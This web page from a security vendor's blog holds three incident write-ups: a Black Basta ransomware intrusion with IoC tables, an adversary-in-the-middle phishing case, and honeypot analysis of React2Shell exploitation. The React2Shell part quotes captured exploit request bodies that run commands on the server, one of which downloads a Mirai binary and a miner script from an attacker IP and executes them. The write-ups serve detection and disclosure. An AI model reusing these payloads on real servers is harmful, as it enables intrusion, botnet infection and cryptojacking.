ブログ
/
Network
/
September 21, 2023

How Darktrace Detected Black Basta Ransomware

Discover how Darktrace uncovered Black Basta ransomware. Learn about its tactics, techniques, and how to protect your network from this threat.
Written by
Matthew John
Director of Operations, SOC
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Matthew John
Director of Operations, SOC
Default blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog image
21
Sep 2023

What is Black Basta?

Over the past year, security researchers have been tracking a new ransomware group, known as Black Basta, that has been observed targeted organizations worldwide to deploy double extortion ransomware attacks since early 2022. While the strain and group are purportedly new, evidence seen suggests they are an offshoot of the Conti ransomware group [1].

The group behind Black Basta run a Ransomware as a Service (RaaS) model. They work with initial access brokers who will typically already have a foothold in company infrastructure to begin their attacks. Once inside a network, they then pivot internally using numerous tools to further their attack.

Black Basta Ransomware

Like many other ransomware actors, Black Basta uses double extortion as part of its modus operandi, exfiltrating sensitive company data and using the publication of this as a second threat to affected companies. This is also advertised on a dark web site, setup by the group to apply further pressure for affected companies to make ransom payments and avoid reputational damage.

The group also seems to regularly take advantage of existing tools to undertake the earlier stages of their attacks. Notably, the Qakbot banking trojan, seems to be the malware often used to gain an initial foothold within compromised environments.

Analysis of the tools, procedures and infrastructure used by Black Basta belies a maturity to the actors behind the ransomware. Their models and practices suggest those involved are experienced individuals, and security researchers have drawn possible links to the Conti ransomware group.

As such, Black Basta is a particular concern for security teams as attacks will likely be more sophisticated, with attackers more patient and able to lie low on digital estates for longer, waiting for the opportune moment to strike.

Cyber security is an infinite game where defender and attacker are stuck as cat and mouse; as new attacks evolve, security vendors and teams respond to the new indicators of compromise (IoCs), and update their existing rulesets and lists. As a result, attackers are forced to change their stripes to evade detection or sometimes even readjust their targets and end goals.

Anomaly Based Detection

By using the power of Darktrace’s Self-Learning AI, security teams are able to detect deviations in behavior. Threat actors need to move through the kill chain to achieve their aims, and in doing so will cause affected devices within networks to deviate from their expected pattern of life. Darktrace’s anomaly-based approach to threat detection allows it recognize these subtle deviations that indicate the presence of an attacker, and stop them in their tracks.

Additionally, the ecosystem of cyber criminals has matured in the last few decades. It is well documented how many groups now operate akin to legitimate companies, with structure, departments and governance. As such, while new attack methods and tactics do appear in the wild, the maturity in their business models belie the experience of those behind the attack.

As attackers grow their business models and develop their arsenal of attack vectors, it becomes even more critical for security teams to remain vigilant to anomalies within networks, and remain agnostic to underlying IoCs and instead adopt anomaly detection tools able to identify tactics, techniques, and procedures (TTPs) that indicate attackers may be moving through a network, ahead of deployment of ransomware and data encryption.

Darktrace’s Coverage of Black Basta

In April 2023, the Darktrace Security Operations Center (SOC) assisted a customer in triaging and responding to an ongoing ransomware infection on their network. On a Saturday, the customer reached out directly to the Darktrace analyst team via the Ask the Expert service for support after they observed encrypted files and locked administrative accounts on their network. The analyst team were able to investigate and clarify the attack path, identifying affected devices and assisting the customer with their remediation. Darktrace DETECT™ observed varying IoCs and TTPs throughout the course of this attack’s kill chain; subsequent analysis into these indicators revealed this had likely been a case of Black Basta seen in the wild.

Initial Intrusion

The methods used by the  group to gain an initial foothold in environments varies – sometimes using phishing, sometimes gaining access through a common vulnerability exposed to the internet. Black Basta actors appear to target specific organizations, as opposed to some groups who aim to hit multiple at once in a more opportunistic fashion.

In the case of the Darktrace customer likely affected by Black Basta, it is probable that the initial intrusion was out of scope. It may be that the path was via a phishing email containing an Microsoft Excel spreadsheet that launches malicious powershell commands; a noted technique for Black Basta. [3][4]  Alternatively, the group may have worked with access brokers who already had a foothold within the customer’s network.

One particular device on the network was observed acting anomalously and was possibly the first to be infected. The device attempted to connect to multiple internal devices over SMB, and connected to a server that was later found to be compromised and is described throughout the course of this blog. During this connection, it wrote a file over SMB, “syncro.exe”, which is possibly a legitimate Remote Management software but could in theory be used to spread an infection laterally. Use of this tool otherwise appears sporadic for the network, and was notably unusual for the environment.

Given these timings, it is possible this activity is related to the likely Black Basta compromise. However, there is some evidence online that use of Syncro has been seen installed as part of the execution of loaders such as Batloader, potentially indicating a separate or concurrent attack [5].

Internal Reconnaissance + Lateral Movement

However the attackers gained access in this instance, the first suspicious activity observed by Darktrace originated from an infected server. The attacker used their foothold in the device to perform internal reconnaissance, enumerating large portions of the network. Darktrace DETECT’s anomaly detection noted a distinct rise in connections to a large number of subnets, particularly to closed ports associated with native Windows services, including:

  • 135 (RPC)
  • 139 (NetBIOS)
  • 445 (SMB)
  • 3389 (RDP)

During the enumeration, SMB connections were observed during which suspiciously named executable files were written:

  • delete.me
  • covet.me

Data Staging and Exfiltration

Around 4 hours after the scanning activity, the attackers used their knowledge gained during enumeration about the environment to begin gathering and staging data for their double extortion attempts. Darktrace observed the same infected server connecting to a file storage server, and downloading over 300 GiB of data. Darktrace DETECT identified that the connections had been made via SMB and was able to present a list of filenames to the customer, allowing their security team to determine the data that had likely been exposed to the attackers.

The SMB paths detected by Darktrace showed a range of departments’ file areas being accessed by threat actors. This suggests they were interested in getting as much varied data as possible, presumably in an attempt to ensure a large amount of valuable information was at their disposal to make any threats of releasing them more credible, and more damaging to the company.

Shortly after the download, the device made an external connection over SSH to a rare domain, dataspt[.]com, hosted in the United States. The connection itself was made over an unusual port, 2022, and Darktrace recognized that the domain was new for the network.

During this upload, the threat actors uploaded a similar volume of data to the 300GiB that had been downloaded internally earlier. Darktrace flagged the usual elements of this external upload, making the identification and triage of this exfiltration attempt easier for the customer.

On top of this, Darktrace’s autonomous investigation tool Cyber AI Analyst™ launched an investigation into this on-going activity and was able to link the external upload events to the internal download, identifying them as one exfiltration incident rather than two isolated events. AI Analyst then provided a detailed summary of the activity detected, further speeding up the identification of affected files.

Preparing for Exploitation

All the activity documented so far had occurred on a Wednesday evening. It was at this point that the burst of activity calmed, and the ransomware lay in wait within the environment. Other devices around the network, particularly those connected to by the original infected server and a domain controller, were observed performing some elements of anomalous activity, but the attack seemed to largely take a pause.

However, on the Saturday morning, 3 days later, the compromised server began to change the way it communicated with attackers by reaching out to a new command and control (C2) endpoint. It seemed that attackers were gearing up for their attack, taking advantage of the weekend to strike while security teams often run with a reduced staffing.

Darktrace identified connections to a new endpoint within 4 minutes of it first being seen on the customer’s environment. The server had begun making repeated SSL connections to the new external endpoint, faceappinc[.]com, which has been flagged as malicious by various open-source intelligence (OSINT) sources.

The observed JA3 hash (d0ec4b50a944b182fc10ff51f883ccf7) suggests that the command-line tool BITS Admin was being used to launch these connections, another suggestion of the use of mature tooling.

In addition to this, Darktrace also detected the server using an administrative credential it had never previously been associated with. Darktrace recognized that the use of this credential represented a deviation from the device’s usual activity and thus could be indicative of compromise.

The server then proceeded to use the new credential to authenticate over Keberos before writing a malicious file (“management.exe”) to the Temp directory on a number of internal devices.

Encryption

At this point, the number of anomalous activities detected from the server increased massively as the attacker seems to connect networkwide in an attempt to cause as quick and destructive an encryption effort as possible. Darktrace observed numerous files that had been encrypted by a local process. The compromised server began to write ransom notes, named “instructions_read_me.txt” to other file servers, which presumably also had successfully deployed payloads. While Black Basta actors had initially been observed dropping ransom notes named “readme.txt”, security researchers have since observed and reported an updated variant of the ransomware that drops “instructions_read_me_.txt”, the name of the file detected by Darktrace, instead [6].

Another server was also observed making repeated SSL connections to the same rare external endpoint, faceappinc[.]com. Shortly after beginning these connections, the device made an HTTP connection to a rare IP address with no hostname, 212.118.55[.]211. During this connection, the device also downloaded a suspicious executable file, cal[.]linux. OSINT research linked the hash of this file to a Black Basta Executable and Linkable File (ELF) variant, indicating that the group was highly likely behind this ransomware attack.

Of particular interest again, is how the attacker lives off the land, utilizing pre-installed Windows services. Darktrace flagged that the server was observed using PsExec, a remote management executable, on multiple devices.

Darktrace Assistance

Darktrace DETECT was able to clearly detect and provide visibility over all stages of the ransomware attack, alerting the customer with multiple model breaches and AI Analyst investigation(s) and highlighting suspicious activity throughout the course of the attack.

For example, the exfiltration of sensitive data was flagged for a number of anomalous features of the meta-data: volume; rarity of the endpoint; port and protocol used.

In total, the portion of the attack observed by Darktrace lasted about 4 days from the first model breach until the ransomware was deployed. In particular, the encryption itself was initiated on a Saturday.

The encryption event itself was initiated on a Saturday, which is not uncommon as threat actors tend to launch their destructive attacks when they expect security teams will be at their lowest capacity. The Darktrace SOC team regularly observes and assists in customer’s in the face of ransomware actors who patiently lie in wait. Attackers often choose to strike as security teams run on reduced hours of manpower, sometimes even choosing to deploy ahead of longer breaks for national or public holidays, for example.

In this case, the customer contacted Darktrace directly through the Ask the Expert (ATE) service. ATE offers customers around the clock access to Darktrace’s team of expert analysts. Customers who subscribe to ATE are able to send queries directly to the analyst team if they are in need of assistance in the face of suspicious network activity or emerging attacks.

In this example, Darktrace’s team of expert analysts worked in tandem with Cyber AI Analyst to investigate the ongoing compromise, ensuring that the investigation and response process were completed as quickly and efficiently as possible.

Thanks to Darktrace’s Self-Learning AI, the analyst team were able to quickly produce a detailed report enumerating the timeline of events. By combining the human expertise of the analyst team and the machine learning capabilities of AI Analyst, Darktrace was able to quickly identify anomalous activity being performed and the affected devices. AI Analyst was then able to collate and present this information into a comprehensive and digestible report for the customer to consult.

Conclusion

It is likely that this ransomware attack was undertaken by the Black Basta group, or at least using tools related to their method. Although Black Basta itself is a relatively novel ransomware strain, there is a maturity and sophistication to its tactics. This indicates that this new group are actually experienced threat actors, with evidence pointing towards it being an offshoot of Conti.

The Pyramid of Pain is a well trodden model in cyber security, but it can help us understand the various features of an attack. Indicators like static C2 destinations or file hashes can easily be changed, but it’s the underlying TTPs that remain the same between attacks.

In this case, the attackers used living off the land techniques, making use of tools such as BITSAdmin, as well as using tried and tested malware such as Qakbot. While the domains and IPs involved will change, the way these malware interact and move about systems remains the same. Their fingerprint therefore causes very similar anomalies in network traffic, and this is where the strength of Darktrace lies.

Darktrace’s anomaly-based approach to threat detection means that these new attack types are quickly drawn out of the noise of everyday traffic within an environment. Once attackers have gained a foothold in a network, they will have to cause deviation from the usual pattern of a life on a network to proceed; Darktrace is uniquely placed to detect even the most subtle changes in a device’s behavior that could be indicative of an emerging threat.

Machine learning can act as a force multiplier for security teams. Working hand in hand with the Darktrace SOC, the customer was able to generate cohesive and comprehensive reporting on the attack path within days. This would be a feat for humans alone, requiring significant resources and time, but with the power of Darktrace’s Self-Learning AI, these deep and complex analyses become as easy as the click of a button.

Credit to: Matthew John, Director of Operations, SOC, Paul Jennings, Principal Analyst Consultant

Get the latest insights on emerging cyber threats

Attackers are adapting, are you ready? This report explores the latest trends shaping the cybersecurity landscape and what defenders need to know in 2025.

  • Identity-based attacks: How attackers are bypassing traditional defenses
  • Zero-day exploitation: The rise of previously unknown vulnerabilities
  • AI-driven threats: How adversaries are leveraging AI to outmaneuver security controls

Stay ahead of evolving threats with expert analysis from Darktrace. Download the report here.

Appendices

Darktrace DETECT Model Breaches

Internal Reconnaissance

Device / Multiple Lateral Movement Model Breaches

Device / Large Number of Model Breaches

Device / Network Scan

Device / Anomalous RDP Followed by Multiple Model Breaches

Device / Possible SMB/NTLM Reconnaissance

Device / SMB Lateral Movement

Anomalous Connection / SMB Enumeration

Anomalous Connection / Possible Share Enumeration Activity

Device / Suspicious SMB Scanning Activity

Device / RDP Scan

Anomalous Connection / Active Remote Desktop Tunnel

Device / Increase in New RPC Services

Device / ICMP Address Scan

Download and Upload

Unusual Activity / Enhanced Unusual External Data Transfer

Unusual Activity / Unusual External Data Transfer

Anomalous Connection / Uncommon 1 GiB Outbound

Anomalous Connection / Data Sent to Rare Domain

Anomalous Connection / Download and Upload

Compliance / SSH to Rare External Destination

Anomalous Server Activity / Rare External from Server

Anomalous Server Activity / Outgoing from Server

Anomalous Connection / Application Protocol on Uncommon Port

Anomalous Connection / Multiple Connections to New External TCP Port

Device / Anomalous SMB Followed By Multiple Model Breaches

Unusual Activity / SMB Access Failures

Lateral Movement and Encryption

User / New Admin Credentials on Server

Compliance / SMB Drive Write

Device / Anomalous RDP Followed By Multiple Model Breaches

Anomalous Connection / High Volume of New or Uncommon Service Control

Anomalous Connection / New or Uncommon Service Control

Device / New or Unusual Remote Command Execution

Anomalous Connection / SMB Enumeration

Additional Beaconing and Tooling

Device / Initial Breach Chain Compromise

Device / Multiple C2 Model Breaches

Compromise / Large Number of Suspicious Failed Connections

Compromise / Sustained SSL or HTTP Increase

Compromise / SSL or HTTP Beacon

Compromise / Suspicious Beaconing Behavior

Compromise / Large Number of Suspicious Successful Connections

Compromise / High Volume of Connections with Beacon Score

Compromise / Slow Beaconing Activity To External Rare

Compromise / SSL Beaconing to Rare Destination

Compromise / Beaconing Activity To External Rare

Compromise / Beacon to Young Endpoint

Compromise / Agent Beacon to New Endpoint

Anomalous Server Activity / Rare External from Server

Anomalous Connection / Multiple Failed Connections to Rare Endpoint

Anomalous File / EXE from Rare External Location

IoC - Type - Description + Confidence

dataspt[.]com - Hostname - Highly Likely Exfiltration Server

46.22.211[.]151:2022 - IP Address and Unusual Port - Highly Likely Exfiltration Server

faceappinc[.]com - Hostname - Likely C2 Infrastructure

Instructions_read_me.txt - Filename - Almost Certain Ransom Note

212.118.55[.]211 - IP Address - Likely C2 Infrastructure

delete[.]me - Filename - Potential lateral movement script

covet[.]me - Filename - Potential lateral movement script

d0ec4b50a944b182fc10ff51f883ccf7 - JA3 Client Fingerprint - Potential Windows BITS C2 Process

/download/cal.linux - URI - Likely BlackBasta executable file

1f4dcfa562f218fcd793c1c384c3006e460213a8 - Sha1 File Hash - Likely BlackBasta executable file

References

[1] https://blogs.blackberry.com/en/2022/05/black-basta-rebrand-of-conti-or-something-new

[2] https://www.cybereason.com/blog/threat-alert-aggressive-qakbot-campaign-and-the-black-basta-ransomware-group-targeting-u.s.-companies

[3] https://www.trendmicro.com/en_us/research/22/e/examining-the-black-basta-ransomwares-infection-routine.html

[4] https://unit42.paloaltonetworks.com/atoms/blackbasta-ransomware/

[5] https://www.trendmicro.com/en_gb/research/23/a/batloader-malware-abuses-legitimate-tools-uses-obfuscated-javasc.html

[6] https://www.pcrisk.com/removal-guides/23666-black-basta-ransomware

執筆者
Matthew John
Director of Operations, SOC
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Matthew John
Director of Operations, SOC

Beyond MFA: Detecting Adversary-in-the-Middle Attacks and Phishing with Darktrace

Email
December 15, 2025
Watch the NIS2 Webinar
よく読まれているブログ
1
Securing Generative AI: Managing Risk in Amazon Bedrock with Darktrace / CLOUD
Nov 19, 2025
2
How Empowering End Users can Improve Your Email Security and Decrease the Burden on the SOC
May 8, 2024
3
Elevating Network Security: Confronting Trust, Ransomware, & Novel Attacks
Jun 21, 2024
4
The State of AI in Cybersecurity: Unveiling Global Insights from 1,800 Security Practitioners
Apr 9, 2024
5
The State of AI in Cybersecurity: The Impact of AI on Cybersecurity Solutions
May 13, 2024

More in this series

No items found.
さらに読む
Network
December 10, 2025

React2Shell: How Opportunist Attackers Exploited CVE-2025-55182 Within Hours

Darktrace observed opportunistic exploitation of the React2Shell vulnerability within minutes of honeypot deployment. Attackers leveraged shell scripts, HTTP beaconing, and cryptomining activity, highlighting rapid adaptation to unpatched flaws.
Nathaniel Bill
Malware Research Engineer
Read more
Network
December 4, 2025

Atomic Stealer: Darktrace’s Investigation of a Growing macOS Threat

Atomic Stealer is rapidly emerging as a significant macOS threat, using infostealing and backdoor capabilities to target Apple users worldwide. Darktrace observed campaigns in 24 countries, detecting activity across multiple kill chain stages and providing recommended actions to contain attacks.
Isabel Evans
Cyber Analyst
Read more
Network
November 26, 2025

CastleLoader & CastleRAT: Behind TAG150’s Modular Malware Delivery System

TAG-150, a MaaS operator active since March 2025, uses CastleLoader and CastleRAT in multi-stage attacks. CastleLoader acts as a loader that retrieves and executes additional malware through deceptive domains and malicious GitHub repositories, while CastleRAT functions as a remote access trojan providing attackers with system control, command execution, and data theft capabilities. Darktrace detected and blocked early attack activity, leveraging Autonomous Response to prevent further compromise and protect enterprise networks.
Read more

Blog

/

Email

/

December 15, 2025

Beyond MFA: Detecting Adversary-in-the-Middle Attacks and Phishing with Darktrace

Default blog imageDefault blog image

What is an Adversary-in-the-middle (AiTM) attack?

Adversary-in-the-Middle (AiTM) attacks are a sophisticated technique often paired with phishing campaigns to steal user credentials. Unlike traditional phishing, which multi-factor authentication (MFA) increasingly mitigates, AiTM attacks leverage reverse proxy servers to intercept authentication tokens and session cookies. This allows attackers to bypass MFA entirely and hijack active sessions, stealthily maintaining access without repeated logins.

This blog examines a real-world incident detected during a Darktrace customer trial, highlighting how Darktrace / EMAILTM and Darktrace / IDENTITYTM identified the emerging compromise in a customer’s email and software-as-a-service (SaaS) environment, tracked its progression, and could have intervened at critical moments to contain the threat had Darktrace’s Autonomous Response capability been enabled.

What does an AiTM attack look like?

Inbound phishing email

Attacks typically begin with a phishing email, often originating from the compromised account of a known contact like a vendor or business partner. These emails will often contain malicious links or attachments leading to fake login pages designed to spoof legitimate login platforms, like Microsoft 365, designed to harvest user credentials.

Proxy-based credential theft and session hijacking

When a user clicks on a malicious link, they are redirected through an attacker-controlled proxy that impersonates legitimate services.  This proxy forwards login requests to Microsoft, making the login page appear legitimate. After the user successfully completes MFA, the attacker captures credentials and session tokens, enabling full account takeover without the need for reauthentication.

Follow-on attacks

Once inside, attackers will typically establish persistence through the creation of email rules or registering OAuth applications. From there, they often act on their objectives, exfiltrating sensitive data and launching additional business email compromise (BEC) campaigns. These campaigns can include fraudulent payment requests to external contacts or internal phishing designed to compromise more accounts and enable lateral movement across the organization.

Darktrace’s detection of an AiTM attack

At the end of September 2025, Darktrace detected one such example of an AiTM attack on the network of a customer trialling Darktrace / EMAIL and Darktrace / IDENTITY.

In this instance, the first indicator of compromise observed by Darktrace was the creation of a malicious email rule on one of the customer’s Office 365 accounts, suggesting the account had likely already been compromised before Darktrace was deployed for the trial.

Darktrace / IDENTITY observed the account creating a new email rule with a randomly generated name, likely to hide its presence from the legitimate account owner. The rule marked all inbound emails as read and deleted them, while ignoring any existing mail rules on the account. This rule was likely intended to conceal any replies to malicious emails the attacker had sent from the legitimate account owner and to facilitate further phishing attempts.

Darktrace’s detection of the anomalous email rule creation.
Figure 1: Darktrace’s detection of the anomalous email rule creation.

Internal and external phishing

Following the creation of the email rule, Darktrace / EMAIL observed a surge of suspicious activity on the user’s account. The account sent emails with subject lines referencing payment information to over 9,000 different external recipients within just one hour. Darktrace also identified that these emails contained a link to an unusual Google Drive endpoint, embedded in the text “download order and invoice”.

Darkrace’s detection of an unusual surge in outbound emails containing suspicious content, shortly following the creation of a new email rule.
Figure 2: Darkrace’s detection of an unusual surge in outbound emails containing suspicious content, shortly following the creation of a new email rule.
Darktrace / EMAIL’s detection of the compromised account sending over 9,000 external phishing emails, containing an unusual Google Drive link.
Figure 3: Darktrace / EMAIL’s detection of the compromised account sending over 9,000 external phishing emails, containing an unusual Google Drive link.

As Darktrace / EMAIL flagged the message with the ‘Compromise Indicators’ tag (Figure 2), it would have been held automatically if the customer had enabled default Data Loss Prevention (DLP) Action Flows in their email environment, preventing any external phishing attempts.

Figure 4: Darktrace / EMAIL’s preview of the email sent by the offending account.
Figure 4: Darktrace / EMAIL’s preview of the email sent by the offending account.

Darktrace analysis revealed that, after clicking the malicious link in the email, recipients would be redirected to a convincing landing page that closely mimicked the customer’s legitimate branding, including authentic imagery and logos, where prompted to download with a PDF named “invoice”.

Figure 5: Download and login prompts presented to recipients after following the malicious email link, shown here in safe view.

After clicking the “Download” button, users would be prompted to enter their company credentials on a page that was likely a credential-harvesting tool, designed to steal corporate login details and enable further compromise of SaaS and email accounts.

Darktrace’s Response

In this case, Darktrace’s Autonomous Response was not fully enabled across the customer’s email or SaaS environments, allowing the compromise to progress,  as observed by Darktrace here.

Despite this, Darktrace / EMAIL’s successful detection of the malicious Google Drive link in the internal phishing emails prompted it to suggest ‘Lock Link’, as a recommended action for the customer’s security team to manually apply. This action would have automatically placed the malicious link behind a warning or screening page blocking users from visiting it.

Autonomous Response suggesting locking the malicious Google Drive link sent in internal phishing emails.
Figure 6: Autonomous Response suggesting locking the malicious Google Drive link sent in internal phishing emails.

Furthermore, if active in the customer’s SaaS environment, Darktrace would likely have been able to mitigate the threat even earlier, at the point of the first unusual activity: the creation of a new email rule. Mitigative actions would have included forcing the user to log out, terminating any active sessions, and disabling the account.

Conclusion

AiTM attacks represent a significant evolution in credential theft techniques, enabling attackers to bypass MFA and hijack active sessions through reverse proxy infrastructure. In the real-world case we explored, Darktrace’s AI-driven detection identified multiple stages of the attack, from anomalous email rule creation to suspicious internal email activity, demonstrating how Autonomous Response could have contained the threat before escalation.

MFA is a critical security measure, but it is no longer a silver bullet. Attackers are increasingly targeting session tokens rather than passwords, exploiting trusted SaaS environments and internal communications to remain undetected. Behavioral AI provides a vital layer of defense by spotting subtle anomalies that traditional tools often miss

Security teams must move beyond static defenses and embrace adaptive, AI-driven solutions that can detect and respond in real time. Regularly review SaaS configurations, enforce conditional access policies, and deploy technologies that understand “normal” behavior to stop attackers before they succeed.

Credit to David Ison (Cyber Analyst), Bertille Pierron (Solutions Engineer), Ryan Traill (Analyst Content Lead)

Appendices

Models

SaaS / Anomalous New Email Rule

Tactic – Technique – Sub-Technique  

Phishing - T1566

Adversary-in-the-Middle - T1557

Continue reading
About the author

Blog

/

Network

/

December 16, 2025

React2Shell: How Opportunist Attackers Exploited CVE-2025-55182 Within Hours

Default blog imageDefault blog image

What is React2Shell?

CVE-2025-55182, also known as React2Shell is a vulnerability within React server components that allows for an unauthenticated attacker to gain remote code execution with a single request. The severity of this vulnerability and ease of exploitability has led to threat actors opportunistically exploiting it within a matter of days of its public disclosure.

Darktrace security researchers rapidly deployed a new honeypot using the Cloudypots system, allowing for the monitoring of exploitation of the vulnerability in the wild.

Cloudypots is a system that enables virtual instances of vulnerable applications to be deployed in the cloud and monitored for attack. This approach allows for Darktrace to deploy high-interaction, realistic honeypots, that appear as genuine deployments of vulnerable software to attackers.

This blog will explore one such campaign, nicknamed “Nuts & Bolts” based on the naming used in payloads.

Analysis of the React2Shell exploit

The React2Shell exploit relies on an insecure deserialization vulnerability within React Server Components’ “Flight” protocol. This protocol uses a custom serialization scheme that security researchers discovered could be abused to run arbitrary JavaScript by crafting the serialized data in a specific way. This is possible because the framework did not perform proper type checking, allowing an attacker to reference types that can be abused to craft a chain that resolves to an anonymous function, and then invoke it with the desired JavaScript as a promise chain.

This code execution can then be used to load the ‘child_process’ node module and execute any command on the target server.

The vulnerability was discovered on December 3, 2025, with a patch made available on the same day [1]. Within 30 hours of the patch, a publicly available proof of concept emerged that could be used to exploit any vulnerable server. This rapid timeline left many servers remaining unpatched by the time attackers began actively exploiting the vulnerability.

Initial access

The threat actor behind the “Nuts & Bolts” campaign uses a spreader server with IP 95.214.52[.]170 to infect victims. The IP appears to be located in Poland and is associated with a hosting provided known as MEVSPACE. The spreader is highly aggressive, launching exploitation attempts, roughly every hour.

When scanning, the spreader primarily targets port 3000, which is the default port for a NEXT.js server in a default or development configuration. It is possible the attacker is avoiding port 80 and 443, as these are more likely to have reverse proxies or WAFs in front of the server, which could disrupt exploitation attempts.

When the spreader finds a new host with port 3000 open, it begins by testing if it is vulnerable to React2Shell by sending a crafted request to run the ‘whoami’ command and store the output in an error digest that is returned to the attacker.

{"then": "$1:proto:then","status": "resolved_model","reason": -1,"value": "{"then":"$B1337"}","_response": {"_prefix": "var res=process.mainModule.require('child_process').execSync('(whoami)',{'timeout':120000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:${res}});","_chunks": "$Q2","_formData": {"get": "$1:constructor:constructor"}}}

The above snippet is the core part of the crafted request that performs the execution. This allows the attacker to confirm that the server is vulnerable and fetch the user account under which the NEXT.js process is running, which is useful information for determining if a target is worth attacking.

From here, the attacker then sends an additional request to run the actual payload on the victim server.

{"then": "$1:proto:then","status": "resolved_model","reason": -1,"value": "{"then":"$B1337"}","_response": {"_prefix": "var res=process.mainModule.require('child_process').execSync('(cd /dev;(busybox wget -O x86 hxxp://89[.]144.31.18/nuts/x86%7C%7Ccurl -s -o x86 hxxp://89[.]144.31.18/nuts/x86 );chmod 777 x86;./x86 reactOnMynuts;(busybox wget -q hxxp://89[.]144.31.18/nuts/bolts -O-||wget -q hxxp://89[.]144.31.18/nuts/bolts -O-||curl -s hxxp://89[.]144.31.18/nuts/bolts)%7Csh)&',{'timeout':120000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:${res}});","_chunks": "$Q2","_formData": {"get": "$1:constructor:constructor"}}}

This snippet attempts to deploy several payloads by using wget (or curl if wget fails) into the /dev directory and execute them. The x86 binary is a Mirai variant that does not appear to have any major alterations to regular Mirai. The ‘nuts/bolts’ endpoint returns a bash script, which is then executed. The script includes several log statements throughout its execution to provide visibility into which parts ran successfully. Similar to the ‘whoami’ request, the output is placed in an error digest for the attacker to review.

In this case, the command-and-control (C2) IP, 89[.]144.31.18, is hosted on a different server operated by a German hosting provider named myPrepaidServer, which offers virtual private server (VPS) services and accepts cryptocurrency payments [2].  

Logs observed in the NEXT.JS console as a result of exploitation. In this case, the honeypot was attacked just two minutes after being deployed.
Figure 1: Logs observed in the NEXT.JS console as a result of exploitation. In this case, the honeypot was attacked just two minutes after being deployed.

Nuts & Bolts script

This script’s primary purpose is to prepare the box for a cryptocurrency miner.

The script starts by attempting to terminate any competing cryptocurrency miner processes using ‘pkill’ that match on a specific name. It will check for and terminate:

  • xmrig
  • softirq (this also matches a system process, which it will fail to kill each invocation)
  • watcher
  • /tmp/a.sh
  • health.sh

Following this, the script will checks for a process named “fghgf”. If it is not running, it will retrieve hxxp://89[.]144.31.18/nuts/lc and write it to /dev/ijnegrrinje.json, as well as retrieving hxxp://89[.]144.31.18/nuts/x and writing it to /dev/fghgf. The script will the executes /dev/fghgf -c /dev/ijnegrrinje.json -B in the background, which is an XMRig miner.

The XMRig deployment script.
Figure 2: The XMRig deployment script.

The miner is configured to connect to two private pools at 37[.]114.37.94 and 37[.]114.37.82, using  “poop” as both the username and password. The use of a private pool conceals the associated wallet address. From here, a short bash script is dropped to /dev/stink.sh. This script continuously crawls all running processes on the system and reads their /proc/pid/exe path, which contains a copy of the original executable that was run. The ‘strings’ utility is run to output all valid ASCII strings found within the data and checks to see if contains either “xmrig”, “rondo” or “UPX 5”. If so, it sends a SIGKILL to the process to terminate it.

Additionally, it will run ‘ls –l’ on the exe path in case it is symlinked to a specific path or has been deleted. If the output contains any of the following strings, the script sends a SIGKILL to terminate the program:

  • (deleted) - Indicates that the original executable was deleted from the disk, a common tactic used by malware to evade detection.
  • xmrig
  • hash
  • watcher
  • /dev/a
  • softirq
  • rondo
  • UPX 5.02
The killer loop and the dropper. In this case ${R}/${K} resolves to /dev/stink.sh.
Figure 3: The killer loop and the dropper. In this case ${R}/${K} resolves to /dev/stink.sh.

Darktrace observations in customer environments  

Following the public disclosure of CVE‑2025‑55182 on December, Darktrace observed multiple exploitation attempts across customer environments beginning around December 4. Darktrace triage identified a series of consistent indicators of compromise (IoCs). By consolidating indicators across multiple deployments and repeat infrastructure clusters, Darktrace identified a consistent kill chain involving shell‑script downloads and HTTP beaconing.

In one example, on December 5, Darktrace observed external connections to malicious IoC endpoints (172.245.5[.]61:38085, 5.255.121[.]141, 193.34.213[.]15), followed by additional connections to other potentially malicious endpoint. These appeared related to the IoCs detailed above, as one suspicious IP address shared the same ASN. After this suspicious external connectivity, Darktrace observed cryptomining-related activity. A few hours later, the device initiated potential lateral movement activity, attempting SMB and RDP sessions with other internal devices on the network. These chain of events appear to identify this activity to be related to the malicious campaign of the exploitation of React2Shell vulnerability.

Generally, outbound HTTP traffic was observed to ports in the range of 3000–3011, most notably port 3001. Requests frequently originated from scripted tools, with user agents such as curl/7.76.1, curl/8.5.0, Wget/1.21.4, and other generic HTTP signatures. The URIs associated with these requests included paths like /nuts/x86 and /n2/x86, as well as long, randomized shell script names such as /gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh. In some cases, parameterized loaders were observed, using query strings like: /?h=<ip>&p=<port>&t=<proto>&a=l64&stage=true.  

Infrastructure analysis revealed repeated callbacks to IP-only hosts linked to ASN AS200593 (Prospero OOO), a well-known “bulletproof” hosting provider often utilized by cyber criminals [3], including addresses such as 193.24.123[.]68:3001 and 91.215.85[.]42:3000, alongside other nodes hosting payloads and staging content.

Darktrace model coverage

Darktrace model coverage consistently highlighted behaviors indicative of exploitation. Among the most frequent detections were anomalous server activity on new, non-standard ports and HTTP requests posted to IP addresses without hostnames, often using uncommon application protocols. Models also flagged the appearance of new user agents such as curl and wget originating from internet-facing systems, representing an unusual deviation from baseline behavior.  

Additionally, observed activity included the download of scripts and executable files from rare external sources, with Darktrace’s Autonomous Response capability intervening to block suspicious transfers, when enabled. Beaconing patterns were another strong signal, with detections for HTTP beaconing to new or rare IP addresses, sustained SSL or HTTP increases, and long-running compromise indicators such as “Beacon for 4 Days” and “Slow Beaconing.”

Conclusion

While this opportunistic campaign to exploit the React2Shell exploit is not particularly sophisticated, it demonstrates that attackers can rapidly prototyping new methods to take advantage of novel vulnerabilities before widespread patching occurs. With a time to infection of only two minutes from the initial deployment of the honeypot, this serves as a clear reminder that patching vulnerabilities as soon as they are released is paramount.

Credit to Nathaniel Bill (Malware Research Engineer), George Kim (Analyst Consulting Lead – AMS), Calum Hall (Technical Content Researcher), Tara Gould (Malware Research Lead, and Signe Zaharka (Principal Cyber Analyst).

Edited by Ryan Traill (Analyst Content Lead)

Appendices

IoCs

